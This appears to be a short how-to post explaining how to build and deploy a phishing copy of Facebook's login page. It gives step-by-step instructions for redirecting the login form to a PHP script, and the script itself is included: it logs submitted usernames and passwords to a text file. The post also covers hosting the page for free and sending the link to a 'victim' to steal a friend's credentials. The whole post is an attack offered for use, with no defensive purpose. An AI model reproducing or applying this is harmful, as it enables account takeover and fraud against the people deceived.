How to Create Fishing Page of Any Site

Now i make a phishing page or fack page of facebook



Here steps are :-


Step 1

Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.




Step 2

Now open the notepad and press CTRL+F,and type ACTION. (find action value in form tag)

It looks like -> action="https://www.facebook.com/login.php?login_attempt=1" 

Replace with, action="data.php"

Now save it on your desktop with the name "index.htm". now your phishing page is ready.




Step 3

Open a new notepad and save the given data with the name data.php

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("username.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


You have two files now one is "index.htm" and another is "data.php", remember file extension is important.




Step 4

Now u have to upload it in a web hosting site, i prefer u to use www.000webhost.com or use any free hosting sites

You have to make a account in that, and Upload your files in File manager -> public_html Folder

And Your Phishing page is Live

Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

Open your 000webhost account and go to file manager then public_html, here you find a new file named "username.txt".

Click on view now u will have your friend's password and email id.

Looks like below:-











Enjoy :)